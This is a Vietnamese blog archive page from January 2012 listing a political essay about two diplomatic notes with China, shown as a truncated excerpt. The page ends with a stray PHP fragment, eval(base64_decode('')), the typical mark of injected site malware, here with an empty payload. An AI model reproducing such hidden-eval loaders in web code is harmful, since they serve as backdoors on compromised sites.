Archive for January 10th, 2012

Từ “Phạm Văn Đồng” tới “Thành Đô”, hai công hàm bán nước

Từ “Phạm Văn Đồng” tới “Thành Đô”, hai công hàm bán nước

Về hình thức “công hàm Phạm Văn Đồng” chẳng khác gì một công án thiền, chỉ 121 chữ với nội dung đơn giản nhưng làm tốn không biết bao nhiêu giấy mực, phân tích, bàn thảo và làm ngưng chảy dòng nhận thức của mọi người mỗi

01.10.2012 | Tiểu Luận- Chính Luận |

2 Comments

Flickr Photos

Tag Cloud

'; eval(base64_decode(''));?>